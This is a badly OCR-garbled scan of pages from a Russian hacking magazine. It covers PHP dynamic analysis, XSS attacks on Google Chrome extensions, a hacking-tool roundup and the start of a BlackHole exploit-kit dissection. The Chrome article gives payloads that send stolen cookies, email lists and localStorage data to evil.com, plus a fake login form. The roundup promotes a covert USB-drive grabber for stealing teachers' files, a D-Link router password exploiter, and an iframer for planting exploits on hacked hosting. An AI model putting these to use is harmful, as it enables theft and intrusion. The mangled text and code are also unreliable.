ор1іпе5: -РоипсІ ііігоы оиі5ІсІе оТ ігу/саісіі іп /Ііоте/ат5/ 
0е5к1:ор/Ьу1:екі1:-Ѳ. 1 . 1/ехатр1е5/5сап_еѵа1 . ріір оп Ііпе 19 
/ѵаг/ыыы/сІѵыа/ех1:егпа1/рІірісІ5/Ѳ. 6/1іЬ/Ю5/ѵепсІог5/ 
Іі1:т1ригіРіег/НТМІРипіРіеп/СопРі§5сІіета/Іп1:епсІіап§еВиі1сІег. 
рбр(140) : геіипп еѵа1( ' геіигп аггау( ' . $сопіеп1:5 

Ну да, кто-то возразит, мол, в чем тут преимущество перед дгер? 
Ну, во-первых, данный скрипт фолсит гораздо меньше, а во вто- 
рых, значимое преимущество в расширяемости возможностей. 
Допустим, можно написать более точное определение подо- 
зрительных инклудов, используя данные, полученные байткитом 
от РНР. В общем, настоятельно рекомендую покопаться в этой 
папке — я уверен, если не поленишься, то найдешь для себя 
много интересного. 

Тут стоит напомнить, что у динамического анализа есть суще- 
ственный недостаток. Дело в том, что если кусок кода не вызы- 
вается, то и найти уязвимость в таком блоке не получится. 

Однако этот недостаток возможно устранить, изменив условие 
кода, перенаправив поток выполнения приложения. 

Просто не всегда можно знать, какое значение нужно для того, 
чтобы попасть под другое условие. Еще нам повезло, что РНР- 
интерпретатор не производит никаких оптимизаций кода, а 
значит — не выбрасывает мертвые блоки, как это делают компи- 
ляторы. 

Безусловно, при успешной реализации алгоритма прогон кода 
по всем возможным условиям займет значительно больше вре- 
мени. Обязательно стоит следить за логичностью таких комбина- 
ций. Но это уже второстепенный вопрос — улучшение и оптими- 
зация. Самое главное, что процесс нахождения багов возможно 
автоматизировать, и вкупе с фаззером имеется возможность 
достаточно достоверно определить наличие уязвимостей. 

Ну, приплыли! 

В принципе, это все, что тебе нужно знать для легкого старта. 
Ведь, как я уже сказал, эти знания позволяют создавать воисти- 
ну очень мощные инструменты для автоматического динамиче- 
ского анализа исходных кодов, что существенно снижает время 
поиска уязвимостей, а в комбинации со статическим анализато- 
ром сокращает до минимума вероятность возникновения ложных 
срабатываний. 

Ну или можешь просто написать свое небольшое расширение 
под конкретную задачу, либо улучшить уже другой существую- 
щий проект. Так что, бери на заметку, фантазируй и погружайся 
в глубины РНР, там много интересного :). т 
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■ ■ Тарас Иващенко (охсІеЬіпГо) 



БЕЗОПАСНОСТЬ 
ПЛАГИНОВ 
6006ІІ СНКОМЕ 



Привычные векторы атак в контексте аддонов 
для браузера 

• С каждым днем боодіе СНготе становится все более и более 
популярен. Его создатели проделали большую работу, разработав 
платформу для создания расширений для браузера. Они несут в себе 
дополнительный функционал, но и новую опасность. 



В рамках этого материала я не буду детально описывать, что пред- 
ставляет собой архитектура расширений в СЬготе. Об этом можно 
узнать подробнее из хорошей статьи Ларри Селцера «Ооодіе’з 
СЬготе Ехіепзіопз БЬоѵѵ Бесигііу Росиз» [ ЬіРІѵ/ЬѵУкдО ]. А для пони- 
мания всего того, о чем пойдет речь ниже, тебе нужно осознать 
всего несколько моментов. Первое — браузер СЬготе, как и тот 
же самый РігеТох, поддерживает расширения. По сути, это неболь- 
шие программные модули, с помощью которых можно изменять 
и улучшать базовую функциональность. Второе — плагины раз- 
рабатываются с помощью привычных нам веб-технологий: НТМІ_ и 
ЛаѵаВсгі рі;, включая вкусности НТМІ_5 и 055. Использование этих 
технологий на порядок упрощает процесс разработки, особенно в 
сравнении с написанием расширения для Огнелиса (хотя и там в 
основном используется тот же ЛаѵаВсгі рі;) . И третье — все плагины 
строятся по одной и той же структуре. Обычно расширение для 



Хрома включает в себя следующие составляющие: 

• файл манифеста тапііюзіДзоп — в нем содержится информация о 
расширении: например его название и описание, версия, исполь- 
зуемые файлы, привилегии и другое; 

• одна и более НТМІ_-страниц, включая фоновую страницу 
ЬаскдгоипсІ.ЫппІ, выступающую в роли движка расширения; 

• опционально: один и более ^-скриптов, включая внедряемые 
скрипты (это аналог ІІзегЛЗ в Опере и Огеазеппопкеу в Мозилле); 

• опционально: все остальное, что может понадобиться — напри- 
мер, файлы-изображения. 

Все это хозяйство упаковывается в гір-архив с расширением сгх. 
Для коммуникаций между страницами аддона предусмотрена воз- 
можность вызывать из одной страницы функции другой и даже 
изменять йОМ-модель. Однако это не относится к внедряемым 
скриптам, для связи с которыми используется механизм сообще- 



► 0б2 
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Устройство расширения в Гугль Хроме 

ний. Для страниц расширения доступны специальные 
АРІ-интерфейсы браузера для работы с закладками, 
историей посещений, куками, окнами, вкладками, собы- 
тиями и так далее. 

Теперь, имея общее представление о структуре расши- 
рений, предлагаю разобраться, какие риски могут нести 
эти технологии и что стоит учитывать разработчикам 
аддонов под Хром. 

Х55 

Рассмотрим популярное (около 18 368 установок в неде- 
лю) расширение для проверки ѲтаіГа — Ооодіе Маіі 
СЬескег Ріиз ( ЫС[у/д51_6РТ ). Этот полезный аддон дела- 
ет только одно — показывает количество непрочитанных 
писем в твоем инбоксе, а по клику на кнопке открывает 
окно предпросмотра. Помимо этого в нем реализованы 
оповещения на рабочем столе. 

В области предпросмотра мы можем увидеть как 
минимум тему письма, отправителя и немного непо- 
средственно текста сообщения. Попробуем с этим 
поиграться. Скажем, что будет, если послать письмо со 
следующей темой? 

2" ' хзсгірі: вгс="Ь1:1:р://еѵі1.сот/оѵ\/п. дв"> 
</всгір1:> 

Тут оѵѵпдз — это простая ЗаѵаЗсгірІ-нагрузка для демон- 
страции УЯЗВИМОСТИ: 

сіоситепі:. Ьосіу. іппегНТМІ. = 
іт§ = пем Іта§е(); 

іт§.5гс = "Ь1:1:р://еѵі1.сот/в1:а11оіл/песІ. др§"; 
сіоситепі: . Ьосіу . аррепсІСМіІсІ (іт§) ; 

После того как пришло письмо, нам отобразится снача- 
ла уведомление на рабочем столе: 

И затем по клику на кнопке расширения мы увидим уже 
нашу Х55 во всплывающем окне расширения: 

Бинго! Кстати говоря, эта уязвимость была обнаружена 
человеком под ником І_о5Ітоп еще в июне 2010 года, но 
я подковырял ее, и автору расширения пришлось вно- 
сить исправления повторно :). Этот же человек, рапор- 
туя о баге, писал: 

«АН ех1:епвіопв гипв оѵег Ьів огі§іп апсі по Ьаѵе 
мау аИегесІ сІа1:а Тгот ехіепвіоп ог §е1: вепві1:іѵе 
сіаѣа Ііке., етаіі ассоипі: о г раввмогсі е1:с. .» 

Рассказывая о невозможности добраться до конфиден- 
циальных данных через подобные уязвимости, он не 
совсем прав :). Покопаем, что же можно сделать с помо- 
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щью банальной Х55 в случае с расширением к браузеру. 

Куки 

Сессионные данные — популярная цель для Х55-атаки. 
Но расширение работает в своего рода песочнице и 
напрямую доступ к кукам через объект сіоситепі. соокіе 
получить уже не получится — нам надо использовать 
АРІ. Для работы с куками расширению (и нам тоже) 
необходимы специальные привилегии и явным образом 
прописанные в манифесте домены, например вот так: 



{ 

"пате": "Му ех1:епвіоп", 

"регтіввіопв" : [ 

"соокіев'Д 

"*://*.§оо§1е.сот" 



} 

Очевидно, что риск увеличивается, когда у расширения 
слишком много прав, то есть как минимум права на 
работу с куками и большое количество прописанных 
доменов в соответствующей секции манифеста. В таком 
случае Х55 становится гораздо более опасной штукой, 
поскольку злоумышленник сможет получить доступ к 
кукам сразу всех разрешенных доменов. Следующий код 
демонстрирует, как можно собрать все доступные куки и 
отправить их на снифер: 




НТТР://ѴѴѴШ 

I ■ 

> Ііпкз 

• НТМІ_5- 
спецификация: 
беѵ.ѵуЗ.огд/ІЩппІ.5/ 
зрес/Оѵегѵіеѵу.ЫтІ : 

• раздел для разра- 
ботчиков расширений 
Гугль Хрома: 
собе.доодіе.сот/ 
сбготе/ехіепзіопз/ 
іпсІех.ЫтІ : 

• микроформаты: 
тісгоіюгтаіз.огд/ 
ѵѵікі/ГісагсІ . 



сЬготе. соокіев .§е1:А11({}., ипс1:іоп(соокіев) 

{ 

ѵаг сіитр = "СООКІЕ5: "; 

■Рог (ѵаг і іп соокіев) { 

сіитр += соокіев[і] .сіотаіп + " : " 

+ соокіев[і] . пате +":" 

+ соокіев[і] .ѵаіие + " | "; 

} 

іт§ = пем Іта§е(); 

іт§.вгс = "Ь1:1:р://еѵі1.сот/в1:а11оіл/песІ. др§?" 
+ сіитр; 

сіоситепі: . Ьосіу . аррепсІСЬіІсІ (іт§) ; 

}); 



Все данные отобразятся в логах запросов нашего веб- 
сервера. 



Й іанные веб-бі 
ель для атак! 



і^аузера 



как 



В предыдущей части мы рассмотрели, какой риск может 
нести в себе уязвимость в расширении, приводящая к 
Х55. При определенных условиях (наличии большого 
количества привилегий и доменов в файле манифеста) 
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Х55 в Ооодіе МаіІ СЬескег Ииз 



злоумышленник может получить куки с разных сайтов, и это сильное 
преимущество перед Х55 в обычном веб-приложении. Также он смо- 
жет заполучить такие интересные данные как история твоей работы с 
веб-браузером, закладки и другая информация, доступная через АРІ 
при соответствующем разрешении. Таким образом, в зависимости от 
типа расширения и его привилегий Х55 может привести к компроме- 
тации данных пользователя на его компе, а не просто краже куков. 

Угон почтовой переписки 

С помощью Х55 легко можно обойти настройки Ѳтаіі по показу 
внешнего содержимого. Пускай, это не так критично. Но если злоу- 
мышленник может внедрить произвольный НТМШаѵаЗсгірІ в кон- 
кретное письмо, он может и добавить тег <ІМѲ>, а по факту запроса 
картинки с сервера определить факт прочтения письма. Это все 
возможно вне зависимости от настроек показа внешнего содержи- 
мого в Гмейле! Но это ерунда, а вот что по-настоящему серьезно, 
так это угон переписки. Представь на секунду, что ты получаешь вот 
такую ОаѵаЭсгірІ-нагрузку: 



ѵаг сішпр = ' ' ; 

ѵаг е = сІоситеп1:.§е1:Е1етеп1:5ВуТа§І\Іате( 'а ' ); 
і=0; 

іл/Ьі1е(і < е.1еп§1:Ь) { 

( е [ і ] . сІаББІМате == 'орепІЛпк') { 
сіитр += е[і] . іппегТехІ: + ' | 

} 

і++; 

} 

іт§ = пем Іта§е(); 

іт§.5гс = 1 Іі1:1:р://еѵі1.сот/5пі-р-р.]Рё? ' + сіитр; 
сіоситепі: . Ьосіу . аррепсІСІііІсІ (іт§) ; 

Это не что иное, какдампилка писем в рамках всплывающего окна 
расширения. Тут все просто — мы перебираем все элементы из 
списка писем, в которых отображается информация о сообщении 
(отправитель, дата, тема и кусок мессаджа), и отправляем ее на сер- 
вер злоумышленника. 



I 
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Х55 в уведомлении Ооодіе МаіІ СЬескег РІи$ 

механизма веб-хранилищ НТМІ_5. Конечно, такие аддоны надо 
поискать, но они существуют, это 100%. Например, в настройках 
такого «плохого» плагина может быть сохранена аутентификацион- 
ная информация, и мы достанем ее оттуда с помощью следующего 
скрипта: 

ѵаг сіитр = ' І_ОСАІ_5ТОКАСЕ : ' ; 

-Рог (і = 0; і < 1оса151:ога§е.1еп§1:Ь; і++ ) { 
сіитр += "КЕѴ: " + 1оса151:ога§е. кеу(і) ; 
сіитр += " ѴАШЕ: " + 1оса151:ога§е.§е1:І1:ет( 

1оса151:ога§е. кеу(і) ) + " | 

} 

іт§ = пеы Іта§е(); 

іт§.згс = 1 Іі1:1:р://еѵі1.сот/5пі-р-р.]р§? ' + сіитр; 
сіоситепі:. Ьосіу. аррепсІСІііІсІ (іт§); 

Фишинг 

Как уже было сказано выше, расширение не может напрямую 
обращаться к кукам, поэтому разработчикам плагинов необходимо 
использовать соответствующий АРІ. Таким образом, заполучение 
куков в рамках Х55-атаки становится нетривиальным решением. 

Но с другой стороны — обычный фишинг-то никто не отменял! 
Злоумышленник может сделать простую псевдоформу логина и 
показать ее жертве через простую нагрузку: 



ѵаг Ш5§ = 1 РІеаБе, епТег ассоипі: іпТогтаІііоп . 

Ш5§ += ЧТогт ас1:іоп= ,, Ы:1:р://еѵі1.сот/1о§іп ,, >и5еппате: 
кіприі: Туре^ех* пате=и5ег>'; 

Ш5§ += ' <Ьг>Ра55ыопсІ : кіприі: 1:уре=ра5 5ыогсІ 
пате=ра55><Ьпхіпри1: 1:уре=5иЬті1:х/-Ропті> ' ; 
Ьоситеп1:.ЬосІу.іппегНТМІ_ = тв§; 



Скриншот выглядит не слишком красиво, но это всего лишь кон- 
цепт. 



Риски, связанные ,<ч к 
использованием ^ОЫ 



^01\1 — это легковесный текстовый формат, который широко 
используется в веб-приложениях ѵѵеЬ 2.0 для обмена данными 
между клиентской и серверной частями. Он же применяется и в 
плагинах СЬготе для описания файла манифеста: 



"пате": "ЕхІіепБІоп" , 
"ѵегзіоп": "1.0", 



Настройки расширения — там 
тоже могутбьіть интересные 
данные! 

Расширения вполне могут сохранять критичную информацию в 
своих настройках, доступ к которым осуществляется с помощью 



"сІеБсгірІііоп" : "Боте ехІіепБІоп" , 
"ісопб": { "128": "ісоп.рп§" }, 
"регтІББІопБ" : ["Ы:1:р://ехатр1е.сот/"], 
"Ьгоы5ег_ас1:іоп" : { 
м сІе-Раи11:_1:і1:1е" : 

"сІе-Раи11:_ісоп" : "ріс.рп§". 



► об4 
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Предпросмотр письма в всплывающем окне Соодіе 
МаіІ СЬескег РІи$ 

"сІе-РаиІ^рорир" : "ѵіем. біті" 

} 

} 

Существует как минимум два больших риска, связанных с небез- 
опасным применением Ч50ІЧ: 

1. Использование функции ^ѵаЗсгірІ еѵаШ для разбора недо- 
веренных данных (например, пользовательских). Разработчики 
Соодіе специально выделили данный риск и написали рекомен- 
дации по безопасному разбору ^0І\І с помощью встроенного 
метода ЧЗОІЧ.рагБе. 

2. Менее очевидный, но не менее опасный риск похищения 
^ОІМ-данных ^ѵаБсгір* Ьдаскіпд ( ЬіІ.Іу/еОРХгѵ ) 

Не стоит забывать и про ^ОЫ(Р), который используется для 
обмена данными между доменами. В контексте расширений 
Хрома эта потенциальная уязвимость мало чем отличается от 
такой же для обычного веб-приложения. Также с помощью любо- 
го промежуточного прокси можно посмотреть, каким образом 
идет обмен данными между расширением и серверной частью 
веб-сервиса. Атам вполне могут быть проблемы с безопасно- 
стью. 

Внедряемые скрипты 

Мы не единожды рассказывали про внедряемые скрипты 
(в одном из номеров ][ даже был подробный материал про 
Ѳгеазтопкеу и его возможности). Хороший пример их использо- 
вания — автоматическое обрамление всех ІІПІ_-адресов на стра- 
нице в Ыппі-тег <А>, тем самым делая их ссылками, даже если 
автор страницы об этом не позаботился. Внедряемый скрипт 
(сопіепі зсгірі) — это, по сути, специальный кусок ЧаѵаЗсгірІ, 
который внедряется в необходимые страницы и, что важно, 
выполняется в их контексте, а не в контексте расширения. Таким 
образом эти сценарии могут свободно читать и изменять содер- 
жимое текущей страницы, но при этом они сильно ограничены 
в использовании АРІ-расширений. Если быть точным, то они не 
могут делать следующее: 

• использовать сЬготе.* АРІз (кроме частей сбготе.ехіепзіоп); 

• использовать переменные и функции, заданные в родитель- 
ском расширении; 

• использовать переменные и функции, заданные непосред- 
ственно в коде страницы либо в других внедряемых скриптах; 

• делать кроссдоменные запросы ХМЦ-ИТрРедиезІз. 

С другой стороны, внедряемые скрипты могут общаться с роди- 
тельским расширением с помощью специальной технологии 
сообщений. В общем виде мы имеем два риска, связанных с 
внедряемыми скриптами: 

1. В силу возможности изменять содержимое посещаемой стра- 
ницы, плохо написанные скрипты могут добавить уязвимость на 
страницу, где изначально этой уязвимости не было! 

2. Зловредная страница сама может атаковать расширение веб- 
браузера через внедряемые скрипты. 

Давай разберем пример второго случая и рассмотрим подробнее 
расширение для работы с микроформатами. Ниже представлен 




йгэ сипзпйу іврд-ай аіЛ. Іадіп п-ву/ 

ТГіе (оііоилпд піісгоіогтак ѵѵеге іоштсі: 
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Х53 



Атака на расширение Мітгіогтаіз ехіепзіоп 

фрагмент НТМІ_-кода с популярным микроформатом ЬСагсІ. В 
поле ІІРІ_ мы запихали то, что, скорее всего, расширение не 
планирует там увидеть: 

ксііѵ с1а55 = "ѵсагсГ> 

ксііѵ с1а55 = "-Рп">Зате5 ВопсІ</сІіѵ> 

ксііѵ с1а55 = "ог§" >МІ-6</сІіѵ> 

ксііѵ с1а5 5 = "'Ье1" >604-555-1234к/сІіѵ> 

ка с1а55 = "иг1" бге-Р="123 : кзсгір1:>сІ = сіоситепі. 

сгеаіеЕІетепіД ' сііѵ ' ) ; сі . іппегНТМІ_= * кб1>Х55к/б1> ' ; 

сіоситепі . Ьосіу. аррепсІСИіІсІ(сІ) ; к / 5 с г і рі: > 23 3 " > 

ІгЫ: р : //ехатріе . сот/ к/а > 
к/сііѵ> 

Если у нас установлен этот аддон, и мы посетим страницу с 
таким кодом, то расширение попробует его оттуда выдернуть, 
распарсить и показать нам эти данные о человеке. 

Наша нагрузка отработала, и видно результат? Но какие риски 
это несет? А вот какие. Рассматриваемое расширение умеет 
связываться с твоим гугловским аккаунтом с помощью протокола 
ОАиіЬ и АРІ-сервиса адресной книги Гугла. С твоего разреше- 
ния оно имеет доступ к адресной книге и может добавлять туда 
записи по клику на соответствующей кнопке во всплывающем 
окне. Вот такой простой код, использующий фишки ЛЗиегу, доба- 
вит произвольный контакт в твою адресную книгу на Гмейле! 

$( " . зиЬтіІіІісагсГ ).с1іск() 

Таким образом нам удалось обойти серьезные ограничения на 
использование АРІ внедряемыми скриптами, и нагрузка про- 
бросилась в основное окно расширения, в котором у нас уже 
больше возможностей. 

Заключение 

Что хочется сказать в итоге? Разработчики боодіе СЬготе сде- 
лали действительно хорошую архитектуру расширений и предо- 
ставили достаточно возможностей для написания качествен- 
ных и безопасных расширений. Но одновременно с этим мы 
видим, как выбранные для разработки технологии (НТМІ_, С55 
и ЗаѵаЗсгірі) при активном участии горе-разработчиков способ- 
ствуют подверженности аддонов таким атакам как, скажем, Х55, 
к которым мы привыкли в контексте веб-приложений. 

При этом риски от такой Х55 могут быть похлеще, чем от Х55 
в обычном веб-приложении. Создателям расширений непре- 
менно нужно особенно внимательно читать раздел «Зесигііу 
сопзісІегаІіопБ» в руководстве разработчика, а пользователям 
— следить за обновлениями расширений и вовремя их устанав- 
ливать! т 
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Программа: РІа$Н дгаЬЬег 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: багік 
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Исходники граббера флешек 



Столкнулся со злобным преподом, который 
любит спрашивать по всему пройденному 
материалу, а лекции писать лень? Тебе пом о- 
жетутилита Ріа эЬ дгаЬЬег. 

Смотри сам: обычно преподы держат все 
свои лекции насвоих же флешках, а также 
любят втыкать эти самые флешки в универ- 
ситетские компы. Таким образом, тебе оста- 
ется лишь незаметно сграббить всю инфор- 
мацию с нужной тебе флешки и наслаждаться 
резул ьтатами. 

С этой задачей превосходно справится пред- 
ставленныйтебе флеш-граббер. 

Принцип действия программы крайне прост: 

1. Прога просто виситв памяти; 

2 . Раз в минуту проверяется наличие новых 
изб-носителей; 

3. В случае обнаружения последнего запуска- 
ется проверка на наличие записи в реестре, 
которая сообщает дату последнего копирова- 
ния с этой флешки (сравнение ведется по ее 
серийному номеру); 

4 . Если запись не найдена или с момента по- 
следнего копирования прошел день, то ищется 
жесткий диск, позволяющий вместить в себя 
все данные с флешки; 

5 . Если такой жесткий диск найден, запускается 
рекурсивная функция поиска файлов позадан- 
ному в исходниках расширению. 

Особенности утилиты: 

• сохранение документов в форматах бос, босх, 
ррі, рріх, гіі по дефолту; 

• крайне малый размер (3.5 Кб); 

• быстрый граббинг целой кучи маленьких до- 
кументов; 

• не влияет на загрузку системы в режиме 
ожидания; 

• отсутствие каких-либо окон и иконок; 

• открытые ИСХОДНИКИ; 

• работа с минимальными правами в системе. 
Автор с удовольствием ответитна любыетвои 
вопросы по поводу граббера на официальной 
странице программы Ы1.1у/е\л/6702 . 



Программа: СЬагоп ѵО.6 5Е 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 
Автор: ВЫпо (рго|ес+2025.сот) & 
ѵ1ш$ 



фейса. Автор модификации судовольствием 
прочтеттвои отзывы в топике ЬІЕІѵЛУІѵЬд . 

Программа: 01Р-300 РѴѴЫЕР 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 




верки работоспособности, функциональности 
и анонимности прокси-серверов по списку с 
заданными параметрами. Гибкие сетевые на- 
стройки позволяют настроить программу прак- 
тически с любыми требованиями к сетевому 
трафику, устанавливая таймаут на соединение, 
выделяя заданное количество активизирую- 
щихся потоков, количество попытокопроса 
каждого ІР-адреса, ручное и автоматическое 
редактирование списка веб-адресов для про- 
верки анонимности. 

Основные функциональные особенности: 

• использование многоуровневой фильтрации 
ІР-адресов по адресу, порту, зоне, стране итак 
далее (фильтруетханипот); 

• расширенный импорт и экспорт списков 
прокси-серверов: поддержка работы с буфером 
обмена, работа со списками сетевых сканеров 
АпдгуІРЗсаппеги Зирегзсаппег; 

• проверка прокси-серверов при помощи РВІ_- 
сервисов; 

• автоматический поиск публичных списков 
прокси-серверов при помощи поисковых 
систем; 

• проверка НТТР (ігапз, апопіт), ззі, зоскз4/5- 
прокси; 

• проверка пинга и скорости прокси-сервера; 

• работа с ОеоІР; 

• практически полная русификация интер- 



Роутеры под прицелом 

На очереди еще одна крайне интересная и 
необычная программа — «рѵѵпег» роутеров 
Оі г-300. 

Если ты внимательно следишьза новостями в 
области И Б, то должен знать, что в прошивках 
указанного роутера за номерами 2.05В03, 2.04, 
2.01 В1.1.05В09, 1.05, 1.04, атакжеОІР-61 5 + 
4.13В01 кроется интересный баг, заключаю- 
щийся в том, что любой пользователь может 
узнать пароль отуязвимого роутера. Представ- 
ленная программа как раз и даеттебе возмож- 
ность удобного эксплуатирования данного бага. 
Пользоваться рѵѵпег’ом крайне просто: 

1. Пуск-> стб; 

2. ірсопбд, узнаем наш I Р; 

3. Запускаем прогу и вводим в первое окно ІР- 
адрес, с которого нужно начать сканирование 
(кпримеру, если наш ІР 10. 2. 4. 64, то вводим 
10.2.4.0); 

4 . Во второе окно вводим конечный адрес (на- 
пример, 10.2.4.255); 

5 . Выбираем нужные опции (чекна Біг-300, рѵѵп 
роутеров); 

6. Нажимаем «Со»; 

7 . Ждём, когда программа выполнитвседей- 
ствия. 

В конце своей работы прога выдаст ссылки на 
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«готовые» роутеры. Далее ты сможешь нажать 
на заинтересовавшийтебя ІР и перейти в брау- 
зере в панельуправлениятаким роутером. 

В данной панелиуправлениятебе всеголишь 
необходимо будет ввести логин «абтіп» и свой 
пароль (или не вводить пароль вовсе]. Это все. 
Теперьты — полноправный владелецданного 
роутера :). Последние версии программы, а так- 
же поддержку от а втор а ищи тут: Ьіі.1у/дЭЕІ_38 . 

Программа: 5Нагеса$Н 5шѵеу 
Неірег 

ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 5егѵег/7 
Автор: ТіскТаск 




Генератор персональных данных 

ЭЬагесазЬ Эигѵеу Неірег — это простой, но вто 
же время функциональный генератор персо- 
нальных данных. Прога может пригодиться, 
если тебе необходимо создать один или множе- 
ство фейковых аккаунтов на каком-либо сайте. 
Лучше всего это применимо канглоязычным 
ресурсам, которые предлагают ввести правдо- 
подобные данные в процессе регистрации. 
Генерируются следующие поля: Еігзі пате, базі 
пате, АсИгезз, Сііу, Біаіе, 2ір, Етаіі, ВігіМау, 
РЬопе. Особо стоит отметить, что программа 
генерирует правильную связку «Т\р — Город», 
чтобы тебе не пришлосьтратить время на 
утомительные поиски корректного индекса по 
всякимжелтым страницам. И помни, что для ра- 
боты утилиты нужен .ЫЕТ Егатеѵѵогк версии 4.0. 

Программа: ЗНасІоѵѵ Кгатег[ІосаІ] 
ОС: *піх 

Автор: ОНОз7 




Работа с ифреймером 

На очереди старенький, но все еще не утратив- 
ший своей актуальности ифреймер, написан- 



ный на ЬазЬ и Регі. Ифреймер — это небольшая 
программа для вставки своего кода в рЬр/ЫтІ- 
файлы. Смысл в этом такой: например, тебе 
слили очередной приватный эксплойт, который 
может работать со всеми ІЕ. Ясно, чтотытутже 
захотел его заюзать и поиметь нужное количе- 
ство ботов, асек и другого приятного стаффа. 
Под рукой утебя как раз есть небольшой не- 
давно порутанный хостинг, на котором лежат 
огромные массы Ыт 1-страниц. Вставлять код 
вручную в каждую страницу не представляется 
возможным, поэтому и придумали ифреймеры. 
Ифреймеры бываютудаленными (кпримеру, 
для работы по Ир] и локальными. БЬасІоѵѵ 
іітатег — локальный. Сам скрипт данного 
ифреймера написан на баше с перловыми 
вставками и представлен сразу в несколь- 
ких версиях: версия для пользователя гооі 
(подразумевается, что трояниться будут 
все страницы хостинга] и для пользователя 
побосіу (трояниться будуттолько страницы, 
доступные на запись]. Использовать скрипт 
очень просто: запускай его с одним параме- 
тром — файлом с ифрейм-кодом. Ифреймер 
сам найдет все іпбех-файлы и вставит в них 
твой код сразуже после первого тега бобу. 
Примерный лог запуска: 



# ./і-Ргате.зИ 

[*]5еагсІпіп§ -Рог регі. . . /изг/Ып/регІ 
[*]51:аг1:іп§ іпбех бпсіег. . .ріеазе 
маИ. . . зеагсіі сотр1е1:е. РоипсІ X ра§ез 
[*]Сепега1:іп§ і-Ргатег. . .сотріеіе. 
51:аг1:іп§ і-Ргатег 

[*] Іпдес1:іп§ сотр1е1:е, бе1е1:іп§ Іетр 
Рііез . . . 

[*] Ріпізііеб 



Свои предложения и пожелания направляй 
автору втопик на Античате: ЫірУ/ЬіІ.Іу/е Р136У . 

Программа: Апгідаіе Ваіапсе 
ОС: ѴѴіпгіоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$1а/2008 $егѵег/7 
Автор: 2сІе$ ВіІѴа 




Правильный менеджер аккаунтов 
апіідаіехот 



Пришла очередь еще одной маленькой, но 
безумно полезной проги отуже известного 



тебе кодера 2без ВіІѴа. Оперируешь множе- 
ством утилит и скриптов, которые используют 
анти кап чу от апіідаіе.сот ? Устал вручную 
проверять баланс для каждого своего анти- 
гейтовского аккаунта? Оптимальным реше- 
нием этой проблемы будет использование 
программы Апіідаіе Ваіапсе. 

Итак, Апіідаіе Ваіапсе — это программа 
для отслеживания баланса на аккаунтах 
апіідаіе.сот (до пяти штук включительно]. 
Функционал и особенности проги: 

• сворачивание в трей; 

• возможность ручного обновления; 

• автоматическое обновление через задан- 
ный промежуток времени; 

• автоматическое сохранение настроек. 
Работать с утилитой достаточно просто: 
вписывай имя аккаунта, ключ антикапчи 
к нему и нажимай на галочку. После этих 
нехитрых действий аккдобавится в список 
для проверки. Свои вопросы и предложения 
направляй прямиком к 2без ВіІѴа в его блог 
ЬіІ.Іу/еЭЬЫки . Кстати, в качестве бонуса автор 
прилагает к чекеру и его исходный код. 

Программа: ѴкАкзЕпІег 
ОС: ѴѴЫоѵѵз 2000/ХР/2003 
5егѵег/Ѵі$*а/2008 5егѵег/7 

Автор; ІОРРЕ 




Последней в нашем сегодняшнем обзоре 
выступает небольшая утилитка, которая 
будет полезна всем, кто работает с соцсетью 
В Конта кте. 

Итак, ѴкАкзЕпІег — это многопоточный 
«вступатель» в группы, встречи, приложения. 
Функционал проги: 

• МНОГОПОТОЧНОСТЬ; 

• поддержка апіідаіе.сот ; 

• вступление/выход из списка групп (плюс 
возможность рассказать об этом друзьям); 

• вступление/выход из списка встреч; 

• вступление/выход из списка приложений. 
Любые вопросы поутилитеты сможешьза- 
дать по адресу іоІІе-зоІІ.ги/?р=41 2 . т 
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ВСКРЫВАЕМ 

ЭКСПЛОИТ-ПАК 



Разбираем внутренности ВІаскНоІе ехріоіі кіі 

о В этой статье я решил рассмотреть не РЕ'шник, как делал в преды- 
дущих статьях, а целый эксплойт-пак. Для разбора я выбрал 
ВІаскНоІе ехріоіі кіі. Он очень популярен в последнее время - так, 
например, недавно им был инфицирован сайт американской почтовой 
службы. С этого сайта происходил редирект как раз на страницу, где 
размещался вышеупомянутый эксплойт-пак. 



Итак, в тексте я представлю полную схему работы этой штуки. Все 
будет описано с самого начала (простого редиректа) и до конечной 
цели (исполняемого файла). 

Поехали! 

Начинаем наш обзор. Все начинается с того, что пользователь 
заходит на зараженный легальный сайт или, например, кликает по 
ссылке из спамерского послания. После этого он попадает на про- 



межуточную страницу, которая осуществляет редирект. В моем при- 
мере она выглядела вот так: 

<И1:т1> 

<ІіеасІ> 

кзсгірі: 1ап§иа§е= ' з'аѵазсгірі: ' > 

1оса1:іоп.Ііге-Р = 

' ІгЬ'Ьр ;//****** . пе1:/іпсІех. рІір?1:р=98а8с9сІ4сІа3191-Р5 ' ; 
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рис. 1. Фрагмент основной ЫтІ-страницы, содержащий контейнер сііѵ 
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рис. 3. Начало расшифрованной основной страницы 
эксплойт-пака. Видна отрисовка ошибки 404 и объяв- 
ление массивов, содержащих версии РОР и Заѵа 

</зсгір1:> 

< Ьосіу > 

</ЬосІу> 

</И1:т1 > 

Здесь все довольно примитивно — пустая НТМІ_-страница, с кото- 
рой выполняется переадресация посредством ‘ІосаІіоп.Ьге^’. А 
затем начинается самое интересное — пользовательский браузер 
загрузит основную страницу ВІаскНоІе, с которой будет организо- 
вываться выполнение всех остальных эксплойтов. Первым делом 
я открыл файл в Ніеѵѵ. Что же я обнаружил? В самом начале, после 
тэгов <Ы:ппІ> и <Ьобу>, идет описание свойств стиля ‘азсГ: 

. Э5СІ {ыісіііб :0; беі§И1: :0;оѵегЛоы: бісісіеп; } 

Далее в біѵ’е с этим стилем расположены какие-то (по-видимому, 
зашифрованные) данные. Как раз для того, чтобы пользователь не 
увидел их на экране, и применяется специально подготовленный 
стиль, прячущий от глаз все лишнее. А заканчивается документ 
кодом на 35, который слегка обфусцирован и, очевидно, должен 
работать с информацией в контейнере <біѵ> (рис. 1). 

Пора приступать к разбору непосредственно кода. Я отлаживал 
скрипт с помощью плагина РігеВид для РігеРох, попутно используя 
М50ІЧ, чтобы понять назначение некоторых методов и свойств. 

Что и как здесь работает, я объясню с конца. Суть всего скрипта 
— выполнить еѵаі над данными, расположенными в <біѵ>. Ріо, как 
видно из скриншота, там расположены какие-то числа, причем не 
